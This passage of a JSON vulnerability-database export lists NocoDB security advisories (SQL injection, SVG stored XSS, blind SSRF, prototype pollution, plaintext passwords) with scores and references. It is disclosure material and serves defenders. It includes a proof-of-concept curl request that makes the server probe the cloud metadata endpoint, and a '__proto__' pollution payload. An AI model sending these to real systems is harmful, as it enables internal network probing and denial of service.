Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28401","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02553","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28401"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:51:53Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wwp2-x4rj-j8rm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:51:53Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-wwp2-x4rj-j8rm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28401","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28401"},{"reference_url":"https://github.com/advisories/GHSA-wwp2-x4rj-j8rm","reference_id":"GHSA-wwp2-x4rj-j8rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wwp2-x4rj-j8rm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28401","GHSA-wwp2-x4rj-j8rm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fvtg-v6h6-r7cf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21352?format=json","vulnerability_id":"VCID-g231-kqp3-63b5","summary":"NocoDB Vulnerable to SQL Injection via DATEADD Formula\n### Summary\nAn authenticated user with Creator role can inject arbitrary SQL via the DATEADD formula's unit parameter.\n\n### Details\nThe third argument (unit) of `DATEADD` was interpolated directly into `knex.raw()` queries after only stripping quote characters. Validation in `formulas.ts` only checked `Literal` AST node types — non-Literal types bypassed validation entirely. Affected MySQL, PostgreSQL, and SQLite function mappings.\n\n### Impact\nSQL injection allowing data exfiltration or modification, scoped to the connected database.\n\n### Credit\nThis issue was reported by [@q1uf3ng](https://github.com/q1uf3ng).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28399","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22308","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28399"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-03T15:53:44Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-45rp-9p97-h852","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-03T15:53:44Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-45rp-9p97-h852"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28399","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28399"},{"reference_url":"https://github.com/advisories/GHSA-45rp-9p97-h852","reference_id":"GHSA-45rp-9p97-h852","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-45rp-9p97-h852"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28399","GHSA-45rp-9p97-h852"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g231-kqp3-63b5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52722?format=json","vulnerability_id":"VCID-g4yf-skds-f3e8","summary":"Improper Privilege Management in NocoDB\nImproper Privilege Management in GitHub repository nocodb/nocodb prior to 0.91.8.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2063","reference_id":"","reference_type":"","scores":[{"value":"0.01073","scoring_system":"epss","scoring_elements":"0.7806","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2063"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/269a19c2ad89a0e8a7596498e3806ff2ec1040c2","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/269a19c2ad89a0e8a7596498e3806ff2ec1040c2"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2262","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2337","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2337"},{"reference_url":"https://huntr.dev/bounties/156f405b-21d6-4384-9bff-17ebfe484e20","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/156f405b-21d6-4384-9bff-17ebfe484e20"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2063","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2063"},{"reference_url":"https://github.com/advisories/GHSA-fq4h-m3c8-8m2v","reference_id":"GHSA-fq4h-m3c8-8m2v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fq4h-m3c8-8m2v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/89143?format=json","purl":"pkg:npm/nocodb@0.91.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ctkq-rnus-b7au"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-u3bd"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.8"}],"aliases":["CVE-2022-2063","GHSA-fq4h-m3c8-8m2v"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g4yf-skds-f3e8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18557?format=json","vulnerability_id":"VCID-ht9j-4wpu-1fdc","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via SVG upload\n## Summary\n\nA **stored Cross-site Scripting (XSS)** vulnerability exists in NocoDB’s attachment handling mechanism. Authenticated users can upload malicious SVG files containing embedded JavaScript, which are later rendered inline and executed in the browsers of other users who view the attachment.\n\nBecause the malicious payload is stored server-side and executed under the application’s origin, successful exploitation can lead to account compromise, data exfiltration and unauthorized actions performed on behalf of affected users.\n\n---\n\n## Vulnerability Details\n\nNocoDB allows file attachments to be previewed inline based on their MIME type. Due to overly permissive MIME type checks and a lack of content sanitization, SVG files containing executable JavaScript are incorrectly treated as safe image content and rendered directly in the browser.\n\n### Root Cause\n\nThe vulnerability results from a combination of **overly permissive MIME type classification** and **unsafe file serving behavior**.\n\n#### 1. Permissive MIME Type Check\n\nIn `attachmentHelpers.ts`, files are considered previewable if their MIME type contains certain substrings:\n\n```ts\nconst previewableMimeTypes = ['image', 'pdf', 'video', 'audio'];\n\nexport const isPreviewAllowed = (args: { mimetype?: string } = {}) => {\n  const { mimetype } = args;\n  if (!mimetype) return false;\n  return previewableMimeTypes.some((type) => mimetype.includes(type));\n};\n```\n\nThis substring-based check (`includes`) causes files with the MIME type `image/svg+xml` to be classified as safe for inline preview. However, SVG is an XML-based format that supports executable JavaScript via `<script>` elements, event handlers, and external references.\n\nNo additional validation or sanitization is performed on SVG content after this classification.\n\n#### 2. Unsafe Inline File Serving\n\nUploaded attachments are served by the `fileReadv3` endpoint in `attachments.controller.ts` without sanitization or content-type enforcement:\n\n```ts\n@Get('/dltemp/:param(*)')\nasync fileReadv3(@Param('param') param: string, @Res() res: Response) {\n  // No authentication guard\n\n  // Sets headers from query parameters\n  res.setHeader('Content-Type', queryParams.contentType);\n  res.setHeader('Content-Disposition', queryParams.contentDisposition);\n\n  // Sends raw file content\n  res.sendFile(file.path);\n}\n```\n\nThe endpoint:\n\n* Preserves the original `Content-Type` (`image/svg+xml`)\n* Uses `Content-Disposition: inline`\n* Sends the raw file contents unmodified\n\nAs a result, browsers render the SVG inline and execute any embedded JavaScript under the NocoDB application’s origin.\n\n---\n\n## Impact\n\nThis is a **stored XSS** vulnerability that can be exploited by authenticated users with permission to upload attachments.\n\nPotential impacts include:\n\n* Account takeover\n* Theft of session cookies or API tokens\n* Unauthorized actions performed on behalf of victims\n* Privilege escalation if higher-privileged users view the malicious attachment\n\n---\n\n## Credit\n\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members @p- (Peter Stöckli) and @m-y-mo (Man Yue Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24769","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05662","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24769"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-q5c6-h22r-qpwr","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-29T14:00:29Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-q5c6-h22r-qpwr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24769","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24769"},{"reference_url":"https://github.com/advisories/GHSA-q5c6-h22r-qpwr","reference_id":"GHSA-q5c6-h22r-qpwr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q5c6-h22r-qpwr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24769","GHSA-q5c6-h22r-qpwr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ht9j-4wpu-1fdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18736?format=json","vulnerability_id":"VCID-kf54-9jbn-j3e7","summary":"NocoDB has Blind SSRF via Unvalidated HEAD Request in uploadViaURL Functionality\n## Summary\n\nA **blind Server-Side Request Forgery (SSRF)** vulnerability exists in the `uploadViaURL` functionality due to an unprotected `HEAD` request. While the subsequent file retrieval logic correctly enforces SSRF protections, the initial metadata request executes without validation.\n\nThis allows limited outbound requests to arbitrary URLs before SSRF controls are applied.\n\n---\n\n## Vulnerability Details\n\nThe `uploadViaURL()` function issues an `axios.head()` request to retrieve metadata (content type, content length, and final URL after redirects). This request is performed **without SSRF filtering**.\n\nAlthough the actual file download is protected by request filtering, the initial `HEAD` request occurs prior to these checks and can be triggered with an attacker-controlled URL.\n\n### Vulnerable Code\n\n```ts\nif (!url.startsWith('data:')) {\n  response = await axios.head(url, { maxRedirects: 5 });\n  mimeType = response.headers['content-type']?.split(';')[0];\n  size = response.headers['content-length'];\n  finalUrl = response.request.res.responseUrl;\n}\n```\n\n---\n\n## Impact\n\nThe impact of this issue is **limited** due to the following constraints:\n\n* Only `HEAD` requests are affected (no response body is returned)\n* No direct exfiltration of response data occurs\n* The subsequent file-fetching logic enforces SSRF protections\n\nHowever, the vulnerability may still allow:\n\n* **Blind SSRF** via outbound `HEAD` requests\n* **Limited internal service probing** (reachability and response behavior)\n* **Interaction with sensitive internal endpoints** that respond to `HEAD` requests\n\nThis issue does **not** provide arbitrary data access or full internal network compromise on its own.\n\n---\n\n## Severity\n\n**Moderate**\n\nThe vulnerability is limited in scope and impact:\n\n* Only `HEAD` requests are affected\n* No response body or sensitive data is directly returned\n* The actual file download logic enforces SSRF protections\n\nWhile the issue permits blind outbound requests to attacker-controlled URLs, it does not enable direct data exfiltration or full internal network compromise on its own.\n\n---\n\n## Proof of Concept\n\n```bash\ncurl -X POST 'http://localhost:8080/api/v2/storage/upload-by-url' \\\n  -H 'Content-Type: application/json' \\\n  -H 'xc-auth: <token>' \\\n  -d '[{\n    \"url\": \"http://169.254.169.254/latest/meta-data/\",\n    \"fileName\": \"test.txt\"\n  }]'\n```\n\nThis request causes the server to issue an unfiltered `HEAD` request before SSRF protections are applied.\n\n---\n\n## Acknowledgements\n\nThis issue was first identified and responsibly disclosed by Faizan Raza of Kolega.dev as part of a security assessment using Kolega.dev Deep Code Scan, including validation and fix recommendations.\n\nNocoDB also acknowledges Neel B for independently reporting the same issue prior to publication.\n\nNocoDB thanks Kolega.dev for their contribution to improving the security posture of the project.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24767","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02749","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24767"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-xr7v-j379-34v9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:20Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-xr7v-j379-34v9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24767","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24767"},{"reference_url":"https://github.com/advisories/GHSA-xr7v-j379-34v9","reference_id":"GHSA-xr7v-j379-34v9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xr7v-j379-34v9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24767","GHSA-xr7v-j379-34v9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kf54-9jbn-j3e7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18760?format=json","vulnerability_id":"VCID-mn3h-sy2t-6fem","summary":"NocoDB has Prototype Pollution in Connection Test Endpoint, Leading to DoS\n### Summary\n\nAn authenticated user with org-level-creator permissions can exploit prototype pollution in the `/api/v2/meta/connection/test` endpoint, causing all database write operations to fail application-wide until server restart.\n\nWhile the pollution technically bypasses SUPER_ADMIN authorization checks, no practical privileged actions can be performed because database operations fail immediately after pollution.\n\n### Details\n\nThe `deepMerge()` function in `packages/nocodb/src/utils/dataUtils.ts` does not sanitize the following keys: (`__proto__`, `constructor`, `prototype`):\n\n```typescript\nexport const deepMerge = (target: any, ...sources: any[]) => {\n  // ...\n  Object.keys(source).forEach((key) => {\n    if (isMergeableObject(source[key])) {\n      if (!target[key]) target[key] = Array.isArray(source[key]) ? [] : {};\n      deepMerge(target[key], source[key]);  // Recursively merges __proto__\n    } else {\n      target[key] = source[key];\n    }\n  });\n  // ...\n};\n```\n\nThe `testConnection` endpoint (`packages/nocodb/src/controllers/utils.controller.ts`) passes user-controlled input directly to `deepMerge()`:\n\n```typescript\nconfig = await integration.getConfig();\ndeepMerge(config, body);\n```\n\nWhen an attacker sends `{\"__proto__\": {\"super\": true}}`, the `super` property is written to `Object.prototype`, affecting all plain objects in the Node.js process.\n\n## Impact\n\nPollutes Object.prototype globally, breaking all subsequent database write operations for all users until process restart.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24766","reference_id":"","reference_type":"","scores":[{"value":"0.00172","scoring_system":"epss","scoring_elements":"0.38374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24766"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.0","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.0"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-95ff-46g6-6gw9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:33Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-95ff-46g6-6gw9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24766","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24766"},{"reference_url":"https://github.com/advisories/GHSA-95ff-46g6-6gw9","reference_id":"GHSA-95ff-46g6-6gw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-95ff-46g6-6gw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24766","GHSA-95ff-46g6-6gw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mn3h-sy2t-6fem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22462?format=json","vulnerability_id":"VCID-n449-xc5n-yuf8","summary":"NocoDB has Plaintext Storage of Shared View Passwords\n### Summary\nShared view passwords were stored in plaintext in the database and compared using direct string equality.\n\n### Details\nThe `password` column in `nc_views` stored unhashed passwords. Verification used `!==` comparison across `public-datas.service.ts`, `public-metas.service.ts`, and 